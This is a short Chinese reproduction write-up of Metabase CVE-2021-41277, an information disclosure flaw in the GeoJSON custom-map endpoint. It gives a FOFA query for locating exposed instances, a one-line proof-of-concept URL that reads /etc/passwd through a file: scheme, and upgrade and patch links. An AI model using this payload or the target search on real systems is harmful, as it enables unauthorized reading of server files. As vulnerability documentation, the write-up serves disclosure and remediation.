Metabase CVE-2021-41277 信息泄露漏洞复现
漏洞简介:
Metabase是美国Metabase公司的一个开源数据分析平台。
Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。
FOFA搜索app="Metabase":
POC
{ {BaseURL}}/api/geojson?url=file:/etc/passwd
输入poc,看到成功显示密码。
漏洞修复:
参考漏洞影响范围,及时升级至最新安全版本:https://github.com/metabase/metabase
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr